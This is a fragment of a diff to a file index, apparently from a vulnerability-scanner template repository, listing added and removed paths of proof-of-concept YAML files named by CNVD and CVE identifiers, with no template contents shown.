+./poc/cve/cnvd-2021-01931-1078.yaml ./poc/cve/cnvd-2021-01931-1079.yaml ./poc/cve/cnvd-2021-09650-1080.yaml -./poc/cve/cnvd-2021-10543-1082.yaml ./poc/cve/cnvd-2021-10543-1083.yaml ./poc/cve/cnvd-2021-10543-1084.yaml ./poc/cve/cnvd-2021-10543-1085.yaml ./poc/cve/cnvd-2021-10543-1086.yaml -./poc/cve/cnvd-2021-14536-1088.yaml -./poc/cve/cnvd-2021-15822-1089.yaml +./poc/cve/cnvd-2021-14536-1087.yaml ./poc/cve/cnvd-2021-15822-1090.yaml ./poc/cve/cnvd-2021-15822-1091.yaml ./poc/cve/cnvd-2021-15822-1092.yaml +./poc/cve/cnvd-2021-15822-1093.yaml ./poc/cve/cnvd-2021-15822-1094.yaml ./poc/cve/cnvd-2021-15822-1095.yaml -./poc/cve/cnvd-2021-15824-1096.yaml +./poc/cve/cnvd-2021-15824-1097.yaml ./poc/cve/cnvd-2021-17369-1098.yaml ./poc/cve/cnvd-2021-17369-1099.yaml ./poc/cve/cnvd-2021-17369-1101.yaml ./poc/cve/cnvd-2021-17369-1102.yaml -./poc/cve/cnvd-2021-26422-1103.yaml ./poc/cve/cnvd-2021-26422-1104.yaml +./poc/cve/cnvd-2021-28277-1105.yaml ./poc/cve/cnvd-2021-28277-1106.yaml ./poc/cve/cnvd-2021-28277-1107.yaml -./poc/cve/cnvd-2021-30167-1108.yaml ./poc/cve/cnvd-2021-30167-1109.yaml ./poc/cve/cnvd-2021-30167-1110.yaml ./poc/cve/cnvd-2021-30167-1111.yaml ./poc/cve/cnvd-2021-30167-1112.yaml -./poc/cve/cnvd-2021-49104-1113.yaml +./poc/cve/cnvd-2021-49104-1114.yaml ./poc/cve/cnvd-2021-49104-1115.yaml -./poc/cve/cnvd-2022-03672-1117.yaml +./poc/cve/cnvd-2022-03672-1116.yaml ./poc/cve/coldfusion-cve-2010-2861-lfi.yml ./poc/cve/confluence-cve-2015-8399.yml ./poc/cve/confluence-cve-2019-3396-lfi.yaml @@ -37131,12 +37113,14 @@ ./poc/cve/craftcms-seomatic-cve-2020-9757-rce.yml ./poc/cve/cve-2000-0114-1295.yaml ./poc/cve/cve-2000-0114-1296.yaml +./poc/cve/cve-2000-0114-1297.yaml ./poc/cve/cve-2001-1473-1298.yaml ./poc/cve/cve-2001-1473-1299.yaml ./poc/cve/cve-2001-1473-1300.yaml ./poc/cve/cve-2002-1131-1301.yaml ./poc/cve/cve-2002-1131-1302.yaml ./poc/cve/cve-2002-1131-1303.yaml +./poc/cve/cve-2002-1131-1304.yaml ./poc/cve/cve-2004-0519-1305.yaml ./poc/cve/cve-2004-0519-1306.yaml ./poc/cve/cve-2004-0519-1307.yaml @@ -37173,7 +37157,6 @@ ./poc/cve/cve-2007-4504-1339.yaml ./poc/cve/cve-2007-4504-1340.yaml ./poc/cve/cve-2007-4504-1341.yaml -./poc/cve/cve-2007-4504-1342.yaml ./poc/cve/cve-2007-4556-1343.yaml ./poc/cve/cve-2007-4556-1344.yaml ./poc/cve/cve-2007-4556-1345.yaml @@ -37229,9 +37212,9 @@ ./poc/cve/cve-2008-6222-1395.yaml ./poc/cve/cve-2008-6222-1396.yaml ./poc/cve/cve-2008-6222-1397.yaml +./poc/cve/cve-2008-6222.yaml ./poc/cve/cve-2008-6668-1398.yaml ./poc/cve/cve-2008-6668-1399.yaml -./poc/cve/cve-2008-6668-1400.yaml ./poc/cve/cve-2008-6668-1401.yaml ./poc/cve/cve-2009-0545-1402.yaml ./poc/cve/cve-2009-0545-1403.yaml @@ -37239,6 +37222,7 @@ ./poc/cve/cve-2009-0545-1405.yaml ./poc/cve/cve-2009-0545-1406.yaml ./poc/cve/cve-2009-0545-1407.yaml +./poc/cve/cve-2009-0545.yaml ./poc/cve/cve-2009-0932-1408.yaml ./poc/cve/cve-2009-0932-1409.yaml ./poc/cve/cve-2009-0932-1410.yaml @@ -37256,7 +37240,6 @@ ./poc/cve/cve-2009-1496-1422.yaml ./poc/cve/cve-2009-1496-1423.yaml ./poc/cve/cve-2009-1496-1424.yaml -./poc/cve/cve-2009-1496.yaml ./poc/cve/cve-2009-1558-1425.yaml ./poc/cve/cve-2009-1558-1426.yaml ./poc/cve/cve-2009-1558-1427.yaml @@ -37273,12 +37256,10 @@ ./poc/cve/cve-2009-2015-1438.yaml ./poc/cve/cve-2009-2015-1439.yaml ./poc/cve/cve-2009-2015-1440.yaml -./poc/cve/cve-2009-2015-1441.yaml ./poc/cve/cve-2009-2100-1442.yaml ./poc/cve/cve-2009-2100-1443.yaml ./poc/cve/cve-2009-2100-1444.yaml ./poc/cve/cve-2009-2100-1445.yaml -./poc/cve/cve-2009-2100-1446.yaml ./poc/cve/cve-2009-2100-1447.yaml ./poc/cve/cve-2009-3053-1448.yaml ./poc/cve/cve-2009-3053-1449.yaml @@ -37286,7 +37267,6 @@ ./poc/cve/cve-2009-3053-1451.yaml ./poc/cve/cve-2009-3053-1452.yaml ./poc/cve/cve-2009-3053-1453.yaml -./poc/cve/cve-2009-3053.yaml ./poc/cve/cve-2009-3318-1454.yaml ./poc/cve/cve-2009-3318-1456.yaml ./poc/cve/cve-2009-3318-1457.yaml @@ -37347,11 +37327,11 @@ ./poc/cve/cve-2010-0943-1515.yaml ./poc/cve/cve-2010-0943-1516.yaml ./poc/cve/cve-2010-0943-1517.yaml +./poc/cve/cve-2010-0943.yaml ./poc/cve/cve-2010-0944-1518.yaml ./poc/cve/cve-2010-0944-1519.yaml ./poc/cve/cve-2010-0944-1520.yaml ./poc/cve/cve-2010-0944-1521.yaml -./poc/cve/cve-2010-0972-1522.yaml ./poc/cve/cve-2010-0972-1523.yaml ./poc/cve/cve-2010-0972-1524.yaml ./poc/cve/cve-2010-0972-1525.yaml @@ -37362,6 +37342,7 @@ ./poc/cve/cve-2010-0982-1530.yaml ./poc/cve/cve-2010-0982-1531.yaml ./poc/cve/cve-2010-0982-1532.yaml +./poc/cve/cve-2010-0982.yaml ./poc/cve/cve-2010-0985-1533.yaml ./poc/cve/cve-2010-0985-1534.yaml ./poc/cve/cve-2010-0985-1535.yaml @@ -37374,7 +37355,6 @@ ./poc/cve/cve-2010-1056-1542.yaml ./poc/cve/cve-2010-1056-1543.yaml ./poc/cve/cve-2010-1056-1544.yaml -./poc/cve/cve-2010-1056.yaml ./poc/cve/cve-2010-1081-1545.yaml ./poc/cve/cve-2010-1081-1546.yaml ./poc/cve/cve-2010-1081-1547.yaml @@ -37400,14 +37380,12 @@ ./poc/cve/cve-2010-1302-1564.yaml ./poc/cve/cve-2010-1302-1565.yaml ./poc/cve/cve-2010-1302-1566.yaml -./poc/cve/cve-2010-1302-1567.yaml ./poc/cve/cve-2010-1304-1568.yaml ./poc/cve/cve-2010-1304-1569.yaml ./poc/cve/cve-2010-1304-1570.yaml ./poc/cve/cve-2010-1304-1571.yaml ./poc/cve/cve-2010-1304-1572.yaml ./poc/cve/cve-2010-1304-1573.yaml -./poc/cve/cve-2010-1305-1574.yaml ./poc/cve/cve-2010-1305-1575.yaml ./poc/cve/cve-2010-1305-1576.yaml ./poc/cve/cve-2010-1305-1577.yaml @@ -37418,7 +37396,6 @@ ./poc/cve/cve-2010-1306-1582.yaml ./poc/cve/cve-2010-1306-1583.yaml ./poc/cve/cve-2010-1306-1584.yaml -./poc/cve/cve-2010-1307-1585.yaml ./poc/cve/cve-2010-1307-1586.yaml ./poc/cve/cve-2010-1307-1587.yaml ./poc/cve/cve-2010-1307-1588.yaml @@ -37427,43 +37404,45 @@ ./poc/cve/cve-2010-1308-1591.yaml ./poc/cve/cve-2010-1308-1592.yaml ./poc/cve/cve-2010-1308-1593.yaml -./poc/cve/cve-2010-1308.yaml ./poc/cve/cve-2010-1312-1594.yaml ./poc/cve/cve-2010-1312-1595.yaml ./poc/cve/cve-2010-1312-1596.yaml ./poc/cve/cve-2010-1312-1597.yaml +./poc/cve/cve-2010-1312-1598.yaml +./poc/cve/cve-2010-1312.yaml ./poc/cve/cve-2010-1313-1599.yaml ./poc/cve/cve-2010-1313-1600.yaml ./poc/cve/cve-2010-1313-1601.yaml ./poc/cve/cve-2010-1313-1602.yaml ./poc/cve/cve-2010-1313-1603.yaml +./poc/cve/cve-2010-1313-1604.yaml ./poc/cve/cve-2010-1314-1605.yaml ./poc/cve/cve-2010-1314-1606.yaml ./poc/cve/cve-2010-1314-1607.yaml ./poc/cve/cve-2010-1314-1608.yaml ./poc/cve/cve-2010-1314-1609.yaml -./poc/cve/cve-2010-1314.yaml ./poc/cve/cve-2010-1315-1610.yaml ./poc/cve/cve-2010-1315-1611.yaml ./poc/cve/cve-2010-1315-1612.yaml ./poc/cve/cve-2010-1315-1613.yaml ./poc/cve/cve-2010-1315-1614.yaml +./poc/cve/cve-2010-1315.yaml ./poc/cve/cve-2010-1340-1615.yaml ./poc/cve/cve-2010-1340-1616.yaml ./poc/cve/cve-2010-1340-1617.yaml ./poc/cve/cve-2010-1340-1618.yaml ./poc/cve/cve-2010-1340-1619.yaml ./poc/cve/cve-2010-1345-1620.yaml +./poc/cve/cve-2010-1345-1621.yaml ./poc/cve/cve-2010-1345-1622.yaml ./poc/cve/cve-2010-1345-1623.yaml ./poc/cve/cve-2010-1345-1624.yaml +./poc/cve/cve-2010-1345.yaml ./poc/cve/cve-2010-1352-1625.yaml ./poc/cve/cve-2010-1352-1626.yaml ./poc/cve/cve-2010-1352-1627.yaml ./poc/cve/cve-2010-1352-1628.yaml ./poc/cve/cve-2010-1352-1629.yaml -./poc/cve/cve-2010-1352.yaml -./poc/cve/cve-2010-1353-1630.yaml ./poc/cve/cve-2010-1353-1631.yaml ./poc/cve/cve-2010-1353-1632.yaml ./poc/cve/cve-2010-1353-1633.yaml @@ -37482,9 +37461,11 @@ ./poc/cve/cve-2010-1469-1647.yaml ./poc/cve/cve-2010-1469-1648.yaml ./poc/cve/cve-2010-1469-1649.yaml +./poc/cve/cve-2010-1469.yaml ./poc/cve/cve-2010-1470-1650.yaml ./poc/cve/cve-2010-1470-1651.yaml ./poc/cve/cve-2010-1470-1652.yaml +./poc/cve/cve-2010-1470-1653.yaml ./poc/cve/cve-2010-1470-1654.yaml ./poc/cve/cve-2010-1471-1655.yaml ./poc/cve/cve-2010-1471-1656.yaml @@ -37506,7 +37487,6 @@ ./poc/cve/cve-2010-1474-1671.yaml ./poc/cve/cve-2010-1474-1672.yaml ./poc/cve/cve-2010-1474-1673.yaml -./poc/cve/cve-2010-1474.yaml ./poc/cve/cve-2010-1475-1674.yaml ./poc/cve/cve-2010-1475-1675.yaml ./poc/cve/cve-2010-1475-1676.yaml @@ -37526,12 +37506,12 @@ ./poc/cve/cve-2010-1491-1691.yaml ./poc/cve/cve-2010-1491-1692.yaml ./poc/cve/cve-2010-1491-1693.yaml -./poc/cve/cve-2010-1491.yaml ./poc/cve/cve-2010-1494-1694.yaml ./poc/cve/cve-2010-1494-1695.yaml ./poc/cve/cve-2010-1494-1696.yaml ./poc/cve/cve-2010-1494-1697.yaml ./poc/cve/cve-2010-1494-1698.yaml +./poc/cve/cve-2010-1494.yaml ./poc/cve/cve-2010-1495-1699.yaml ./poc/cve/cve-2010-1495-1700.yaml ./poc/cve/cve-2010-1495-1701.yaml @@ -37546,7 +37526,6 @@ ./poc/cve/cve-2010-1532-1710.yaml ./poc/cve/cve-2010-1532-1711.yaml ./poc/cve/cve-2010-1532-1712.yaml -./poc/cve/cve-2010-1532.yaml ./poc/cve/cve-2010-1533-1713.yaml ./poc/cve/cve-2010-1533-1714.yaml ./poc/cve/cve-2010-1533-1715.yaml @@ -37563,7 +37542,6 @@ ./poc/cve/cve-2010-1535-1726.yaml ./poc/cve/cve-2010-1535-1727.yaml ./poc/cve/cve-2010-1535-1728.yaml -./poc/cve/cve-2010-1540-1729.yaml ./poc/cve/cve-2010-1540-1730.yaml ./poc/cve/cve-2010-1540-1731.yaml ./poc/cve/cve-2010-1540-1732.yaml @@ -37596,34 +37574,33 @@ ./poc/cve/cve-2010-1653-1757.yaml ./poc/cve/cve-2010-1653-1758.yaml ./poc/cve/cve-2010-1657-1760.yaml -./poc/cve/cve-2010-1657-1761.yaml ./poc/cve/cve-2010-1657-1762.yaml ./poc/cve/cve-2010-1657-1763.yaml ./poc/cve/cve-2010-1657-1764.yaml +./poc/cve/cve-2010-1658-1765.yaml ./poc/cve/cve-2010-1658-1766.yaml ./poc/cve/cve-2010-1658-1767.yaml ./poc/cve/cve-2010-1658-1768.yaml ./poc/cve/cve-2010-1658-1769.yaml +./poc/cve/cve-2010-1658.yaml ./poc/cve/cve-2010-1659-1770.yaml ./poc/cve/cve-2010-1659-1771.yaml ./poc/cve/cve-2010-1659-1772.yaml -./poc/cve/cve-2010-1659-1773.yaml ./poc/cve/cve-2010-1659-1774.yaml ./poc/cve/cve-2010-1714-1775.yaml ./poc/cve/cve-2010-1714-1776.yaml ./poc/cve/cve-2010-1714-1777.yaml ./poc/cve/cve-2010-1714-1778.yaml +./poc/cve/cve-2010-1714-1779.yaml ./poc/cve/cve-2010-1715-1780.yaml ./poc/cve/cve-2010-1715-1781.yaml ./poc/cve/cve-2010-1715-1782.yaml ./poc/cve/cve-2010-1715-1783.yaml ./poc/cve/cve-2010-1715-1784.yaml ./poc/cve/cve-2010-1715-1785.yaml -./poc/cve/cve-2010-1715.yaml ./poc/cve/cve-2010-1717-1786.yaml ./poc/cve/cve-2010-1717-1787.yaml ./poc/cve/cve-2010-1717-1788.yaml -./poc/cve/cve-2010-1717-1789.yaml ./poc/cve/cve-2010-1717-1790.yaml ./poc/cve/cve-2010-1718-1791.yaml ./poc/cve/cve-2010-1718-1792.yaml @@ -37631,7 +37608,6 @@ ./poc/cve/cve-2010-1718-1794.yaml ./poc/cve/cve-2010-1718-1795.yaml ./poc/cve/cve-2010-1718-1796.yaml -./poc/cve/cve-2010-1718.yaml ./poc/cve/cve-2010-1719-1797.yaml ./poc/cve/cve-2010-1719-1798.yaml ./poc/cve/cve-2010-1719-1799.yaml @@ -37652,7 +37628,6 @@ ./poc/cve/cve-2010-1858-1814.yaml ./poc/cve/cve-2010-1858-1815.yaml ./poc/cve/cve-2010-1858-1816.yaml -./poc/cve/cve-2010-1858.yaml ./poc/cve/cve-2010-1870-1817.yaml ./poc/cve/cve-2010-1870-1818.yaml ./poc/cve/cve-2010-1870-1819.yaml @@ -37676,6 +37651,7 @@ ./poc/cve/cve-2010-1952-1838.yaml ./poc/cve/cve-2010-1952-1839.yaml ./poc/cve/cve-2010-1953-1840.yaml +./poc/cve/cve-2010-1953-1841.yaml ./poc/cve/cve-2010-1953-1842.yaml ./poc/cve/cve-2010-1953-1843.yaml ./poc/cve/cve-2010-1954-1844.yaml @@ -37717,12 +37693,14 @@ ./poc/cve/cve-2010-1981-1880.yaml ./poc/cve/cve-2010-1981-1881.yaml ./poc/cve/cve-2010-1981-1882.yaml +./poc/cve/cve-2010-1981.yaml ./poc/cve/cve-2010-1982-1883.yaml ./poc/cve/cve-2010-1982-1884.yaml ./poc/cve/cve-2010-1982-1885.yaml ./poc/cve/cve-2010-1982-1886.yaml ./poc/cve/cve-2010-1982-1887.yaml ./poc/cve/cve-2010-1982-1888.yaml +./poc/cve/cve-2010-1982.yaml ./poc/cve/cve-2010-1983-1889.yaml ./poc/cve/cve-2010-1983-1890.yaml ./poc/cve/cve-2010-1983-1891.yaml @@ -37794,6 +37772,7 @@ ./poc/cve/cve-2010-2680-1958.yaml ./poc/cve/cve-2010-2680-1959.yaml ./poc/cve/cve-2010-2680.yaml +./poc/cve/cve-2010-2682-1960.yaml ./poc/cve/cve-2010-2682-1961.yaml ./poc/cve/cve-2010-2682-1962.yaml ./poc/cve/cve-2010-2682-1963.yaml @@ -37817,11 +37796,12 @@ ./poc/cve/cve-2010-2920-1981.yaml ./poc/cve/cve-2010-2920-1982.yaml ./poc/cve/cve-2010-2920-1983.yaml -./poc/cve/cve-2010-2920.yaml ./poc/cve/cve-2010-3203-1984.yaml ./poc/cve/cve-2010-3203-1985.yaml ./poc/cve/cve-2010-3203-1986.yaml +./poc/cve/cve-2010-3203-1987.yaml ./poc/cve/cve-2010-3203-1988.yaml +./poc/cve/cve-2010-3203.yaml ./poc/cve/cve-2010-3426-1989.yaml ./poc/cve/cve-2010-3426-1990.yaml ./poc/cve/cve-2010-3426-1991.yaml @@ -37830,7 +37810,6 @@ ./poc/cve/cve-2010-4231-1994.yaml ./poc/cve/cve-2010-4231-1995.yaml ./poc/cve/cve-2010-4231-1996.yaml -./poc/cve/cve-2010-4239-1997.yaml ./poc/cve/cve-2010-4239-1998.yaml ./poc/cve/cve-2010-4282-1999.yaml ./poc/cve/cve-2010-4282-2000.yaml @@ -37840,7 +37819,6 @@ ./poc/cve/cve-2010-4617-2004.yaml ./poc/cve/cve-2010-4617-2005.yaml ./poc/cve/cve-2010-4617-2006.yaml -./poc/cve/cve-2010-4617.yaml ./poc/cve/cve-2010-4719-2007.yaml ./poc/cve/cve-2010-4719-2008.yaml ./poc/cve/cve-2010-4719-2009.yaml @@ -37857,10 +37835,13 @@ ./poc/cve/cve-2010-5028-2022.yaml ./poc/cve/cve-2010-5028-2023.yaml ./poc/cve/cve-2010-5028-2024.yaml +./poc/cve/cve-2010-5028-2025.yaml ./poc/cve/cve-2010-5278-2026.yaml ./poc/cve/cve-2010-5278-2027.yaml ./poc/cve/cve-2010-5278-2028.yaml ./poc/cve/cve-2010-5278-2029.yaml +./poc/cve/cve-2010-5278-2030.yaml +./poc/cve/cve-2010-5278.yaml ./poc/cve/cve-2010-5286-2031.yaml ./poc/cve/cve-2010-5286-2032.yaml ./poc/cve/cve-2010-5286-2033.yaml @@ -37880,14 +37861,12 @@ ./poc/cve/cve-2011-2744-2049.yaml ./poc/cve/cve-2011-2744-2050.yaml ./poc/cve/cve-2011-2744-2051.yaml -./poc/cve/cve-2011-2744.yaml ./poc/cve/cve-2011-2780-2052.yaml ./poc/cve/cve-2011-2780-2053.yaml ./poc/cve/cve-2011-2780-2054.yaml ./poc/cve/cve-2011-2780-2055.yaml ./poc/cve/cve-2011-2780-2056.yaml ./poc/cve/cve-2011-3315-2058.yaml -./poc/cve/cve-2011-3315-2059.yaml ./poc/cve/cve-2011-3315-2060.yaml ./poc/cve/cve-2011-3315-2061.yaml ./poc/cve/cve-2011-4336-2062.yaml @@ -37922,6 +37901,7 @@ ./poc/cve/cve-2011-4926-2090.yaml ./poc/cve/cve-2011-4926-2091.yaml ./poc/cve/cve-2011-4926-2092.yaml +./poc/cve/cve-2011-4926.yaml ./poc/cve/cve-2011-4969.yaml ./poc/cve/cve-2011-5106-2093.yaml ./poc/cve/cve-2011-5106-2094.yaml @@ -37942,7 +37922,6 @@ ./poc/cve/cve-2011-5179-2109.yaml ./poc/cve/cve-2011-5179-2110.yaml ./poc/cve/cve-2011-5179-2111.yaml -./poc/cve/cve-2011-5179.yaml ./poc/cve/cve-2011-5181-2112.yaml ./poc/cve/cve-2011-5181-2113.yaml ./poc/cve/cve-2011-5181-2114.yaml @@ -37964,7 +37943,6 @@ ./poc/cve/cve-2012-0392-2129.yaml ./poc/cve/cve-2012-0392-2130.yaml ./poc/cve/cve-2012-0392-2131.yaml -./poc/cve/cve-2012-0896-2132.yaml ./poc/cve/cve-2012-0896-2133.yaml ./poc/cve/cve-2012-0896-2134.yaml ./poc/cve/cve-2012-0896-2135.yaml @@ -37980,6 +37958,7 @@ ./poc/cve/cve-2012-0981-2145.yaml ./poc/cve/cve-2012-0981-2146.yaml ./poc/cve/cve-2012-0981-2147.yaml +./poc/cve/cve-2012-0981.yaml ./poc/cve/cve-2012-0991-2148.yaml ./poc/cve/cve-2012-0991-2149.yaml ./poc/cve/cve-2012-0991-2150.yaml @@ -38010,6 +37989,7 @@ ./poc/cve/cve-2012-2371-2177.yaml ./poc/cve/cve-2012-2371-2178.yaml ./poc/cve/cve-2012-2371-2179.yaml +./poc/cve/cve-2012-2371.yaml ./poc/cve/cve-2012-3153-2180.yaml ./poc/cve/cve-2012-3153-2181.yaml ./poc/cve/cve-2012-3153-2182.yaml @@ -38030,6 +38010,7 @@ ./poc/cve/cve-2012-4273-2195.yaml ./poc/cve/cve-2012-4273-2196.yaml ./poc/cve/cve-2012-4273-2197.yaml +./poc/cve/cve-2012-4273-2198.yaml ./poc/cve/cve-2012-4547-2199.yaml ./poc/cve/cve-2012-4547-2200.yaml ./poc/cve/cve-2012-4547-2201.yaml @@ -38038,6 +38019,7 @@ ./poc/cve/cve-2012-4768-2204.yaml ./poc/cve/cve-2012-4768-2205.yaml ./poc/cve/cve-2012-4768-2206.yaml +./poc/cve/cve-2012-4768-2207.yaml ./poc/cve/cve-2012-4878-2208.yaml ./poc/cve/cve-2012-4878-2209.yaml ./poc/cve/cve-2012-4878-2210.yaml @@ -38109,11 +38091,9 @@ ./poc/cve/cve-2013-5528-2274.yaml ./poc/cve/cve-2013-5528-2275.yaml ./poc/cve/cve-2013-5528-2276.yaml -./poc/cve/cve-2013-5528.yaml ./poc/cve/cve-2013-5979-2277.yaml ./poc/cve/cve-2013-5979-2278.yaml ./poc/cve/cve-2013-5979-2279.yaml -./poc/cve/cve-2013-5979-2280.yaml ./poc/cve/cve-2013-6281-2281.yaml ./poc/cve/cve-2013-7091-2282.yaml ./poc/cve/cve-2013-7091-2283.yaml @@ -38123,6 +38103,7 @@ ./poc/cve/cve-2013-7240-2288.yaml ./poc/cve/cve-2013-7240-2289.yaml ./poc/cve/cve-2013-7240-2290.yaml +./poc/cve/cve-2013-7240.yaml ./poc/cve/cve-2014-10037-2291.yaml ./poc/cve/cve-2014-10037-2292.yaml ./poc/cve/cve-2014-10037-2293.yaml @@ -38145,6 +38126,7 @@ ./poc/cve/cve-2014-2908-2310.yaml ./poc/cve/cve-2014-2908-2311.yaml ./poc/cve/cve-2014-2962-2312.yaml +./poc/cve/cve-2014-2962-2313.yaml ./poc/cve/cve-2014-2962-2314.yaml ./poc/cve/cve-2014-2962-2315.yaml ./poc/cve/cve-2014-3120-2316.yaml @@ -38204,7 +38186,6 @@ ./poc/cve/cve-2014-4561-2372.yaml ./poc/cve/cve-2014-4561-2373.yaml ./poc/cve/cve-2014-4561-2374.yaml -./poc/cve/cve-2014-4561-2375.yaml ./poc/cve/cve-2014-4592-2376.yaml ./poc/cve/cve-2014-4592-2377.yaml ./poc/cve/cve-2014-4592-2378.yaml @@ -38215,7 +38196,6 @@ ./poc/cve/cve-2014-4940-2383.yaml ./poc/cve/cve-2014-4940-2384.yaml ./poc/cve/cve-2014-4940-2385.yaml -./poc/cve/cve-2014-4940.yaml ./poc/cve/cve-2014-5111-2386.yaml ./poc/cve/cve-2014-5111-2387.yaml ./poc/cve/cve-2014-5111-2388.yaml @@ -38254,6 +38234,7 @@ ./poc/cve/cve-2014-9094-2420.yaml ./poc/cve/cve-2014-9094-2421.yaml ./poc/cve/cve-2014-9094-2422.yaml +./poc/cve/cve-2014-9094.yaml ./poc/cve/cve-2014-9444-2423.yaml ./poc/cve/cve-2014-9444-2424.yaml ./poc/cve/cve-2014-9444-2425.yaml @@ -38261,12 +38242,14 @@ ./poc/cve/cve-2014-9444-2427.yaml ./poc/cve/cve-2014-9606-2428.yaml ./poc/cve/cve-2014-9606-2429.yaml +./poc/cve/cve-2014-9606-2430.yaml ./poc/cve/cve-2014-9607-2431.yaml ./poc/cve/cve-2014-9607-2432.yaml ./poc/cve/cve-2014-9607-2433.yaml ./poc/cve/cve-2014-9608-2434.yaml ./poc/cve/cve-2014-9608-2435.yaml ./poc/cve/cve-2014-9608-2436.yaml +./poc/cve/cve-2014-9609-2437.yaml ./poc/cve/cve-2014-9609-2438.yaml ./poc/cve/cve-2014-9609-2439.yaml ./poc/cve/cve-2014-9614-2440.yaml @@ -38284,7 +38267,6 @@ ./poc/cve/cve-2015-0554-2453.yaml ./poc/cve/cve-2015-0554-2454.yaml ./poc/cve/cve-2015-0554-2455.yaml -./poc/cve/cve-2015-0554-2456.yaml ./poc/cve/cve-2015-1000012-2457.yaml ./poc/cve/cve-2015-1000012-2458.yaml ./poc/cve/cve-2015-1000012-2459.yaml @@ -38304,7 +38286,6 @@ ./poc/cve/cve-2015-1880-2474.yaml ./poc/cve/cve-2015-1880-2475.yaml ./poc/cve/cve-2015-1880-2476.yaml -./poc/cve/cve-2015-1880-2477.yaml ./poc/cve/cve-2015-1880-2478.yaml ./poc/cve/cve-2015-2067-2479.yaml ./poc/cve/cve-2015-2067-2480.yaml @@ -38324,14 +38305,12 @@ ./poc/cve/cve-2015-2166-2494.yaml ./poc/cve/cve-2015-2166-2495.yaml ./poc/cve/cve-2015-2166-2496.yaml -./poc/cve/cve-2015-2166.yaml ./poc/cve/cve-2015-2794.yaml ./poc/cve/cve-2015-2807-2497.yaml ./poc/cve/cve-2015-2807-2498.yaml ./poc/cve/cve-2015-2807-2499.yaml ./poc/cve/cve-2015-2807-2500.yaml ./poc/cve/cve-2015-2807-2501.yaml -./poc/cve/cve-2015-3306-2502.yaml ./poc/cve/cve-2015-3306-2503.yaml ./poc/cve/cve-2015-3306-2504.yaml ./poc/cve/cve-2015-3306-2505.yaml @@ -38356,7 +38335,6 @@ ./poc/cve/cve-2015-4050-2524.yaml ./poc/cve/cve-2015-4050-2525.yaml ./poc/cve/cve-2015-4050-2526.yaml -./poc/cve/cve-2015-4050.yaml ./poc/cve/cve-2015-4414-2527.yaml ./poc/cve/cve-2015-4414-2528.yaml ./poc/cve/cve-2015-4414-2529.yaml @@ -38433,6 +38411,7 @@ ./poc/cve/cve-2015-7780-2601.yaml ./poc/cve/cve-2015-7780-2602.yaml ./poc/cve/cve-2015-7780-2603.yaml +./poc/cve/cve-2015-7780-2604.yaml ./poc/cve/cve-2015-7823-2605.yaml ./poc/cve/cve-2015-7823-2606.yaml ./poc/cve/cve-2015-7823-2607.yaml @@ -38476,7 +38455,6 @@ ./poc/cve/cve-2016-1000128-2648.yaml ./poc/cve/cve-2016-1000128-2649.yaml ./poc/cve/cve-2016-1000128-2650.yaml -./poc/cve/cve-2016-1000128-2651.yaml ./poc/cve/cve-2016-1000129-2652.yaml ./poc/cve/cve-2016-1000129-2653.yaml ./poc/cve/cve-2016-1000129-2654.yaml @@ -38494,7 +38472,6 @@ ./poc/cve/cve-2016-1000132-2666.yaml ./poc/cve/cve-2016-1000132-2667.yaml ./poc/cve/cve-2016-1000132-2668.yaml -./poc/cve/cve-2016-1000132-2669.yaml ./poc/cve/cve-2016-1000132-2670.yaml ./poc/cve/cve-2016-1000133-2671.yaml ./poc/cve/cve-2016-1000133-2672.yaml @@ -38503,7 +38480,6 @@ ./poc/cve/cve-2016-1000133-2675.yaml ./poc/cve/cve-2016-1000134-2676.yaml ./poc/cve/cve-2016-1000134-2677.yaml -./poc/cve/cve-2016-1000134-2678.yaml ./poc/cve/cve-2016-1000134-2679.yaml ./poc/cve/cve-2016-1000134-2680.yaml ./poc/cve/cve-2016-1000135-2681.yaml @@ -38541,7 +38517,6 @@ ./poc/cve/cve-2016-1000142-2714.yaml ./poc/cve/cve-2016-1000143-2715.yaml ./poc/cve/cve-2016-1000143-2716.yaml -./poc/cve/cve-2016-1000143-2717.yaml ./poc/cve/cve-2016-1000146-2718.yaml ./poc/cve/cve-2016-1000146-2719.yaml ./poc/cve/cve-2016-1000146-2720.yaml @@ -38564,6 +38539,7 @@ ./poc/cve/cve-2016-1000154-2737.yaml ./poc/cve/cve-2016-1000154-2738.yaml ./poc/cve/cve-2016-1000154-2739.yaml +./poc/cve/cve-2016-1000154-2740.yaml ./poc/cve/cve-2016-1000155-2741.yaml ./poc/cve/cve-2016-1000155-2742.yaml ./poc/cve/cve-2016-1000155-2743.yaml @@ -38578,7 +38554,6 @@ ./poc/cve/cve-2016-10924-2754.yaml ./poc/cve/cve-2016-10924-2755.yaml ./poc/cve/cve-2016-10940-2756.yaml -./poc/cve/cve-2016-10940-2757.yaml ./poc/cve/cve-2016-10956-2758.yaml ./poc/cve/cve-2016-10956-2759.yaml ./poc/cve/cve-2016-10956-2760.yaml @@ -38625,7 +38600,6 @@ ./poc/cve/cve-2016-5649-2801.yaml ./poc/cve/cve-2016-6210-2802.yaml ./poc/cve/cve-2016-6210-2803.yaml -./poc/cve/cve-2016-6210.yaml ./poc/cve/cve-2016-6277-2804.yaml ./poc/cve/cve-2016-6277-2806.yaml ./poc/cve/cve-2016-6277-2807.yaml @@ -38633,7 +38607,6 @@ ./poc/cve/cve-2016-7552-2809.yaml ./poc/cve/cve-2016-7552-2810.yaml ./poc/cve/cve-2016-7552-2811.yaml -./poc/cve/cve-2016-7552-2812.yaml ./poc/cve/cve-2016-7552-2813.yaml ./poc/cve/cve-2016-7981-2814.yaml ./poc/cve/cve-2016-7981-2815.yaml @@ -38703,6 +38676,7 @@ ./poc/cve/cve-2017-12149-2881.yaml ./poc/cve/cve-2017-12149-2882.yaml ./poc/cve/cve-2017-12149-2883.yaml +./poc/cve/cve-2017-12542-2884.yaml ./poc/cve/cve-2017-12542-2885.yaml ./poc/cve/cve-2017-12542-2886.yaml ./poc/cve/cve-2017-12542-2887.yaml @@ -38723,7 +38697,6 @@ ./poc/cve/cve-2017-12615-2903.yaml ./poc/cve/cve-2017-12615-2904.yaml ./poc/cve/cve-2017-12615-2905.yaml -./poc/cve/cve-2017-12615.yaml ./poc/cve/cve-2017-12629-2906.yaml ./poc/cve/cve-2017-12629-2907.yaml ./poc/cve/cve-2017-12629-2908.yaml @@ -38746,7 +38719,6 @@ ./poc/cve/cve-2017-14135-2925.yaml ./poc/cve/cve-2017-14135-2926.yaml ./poc/cve/cve-2017-14535-2927.yaml -./poc/cve/cve-2017-14535-2928.yaml ./poc/cve/cve-2017-14535-2929.yaml 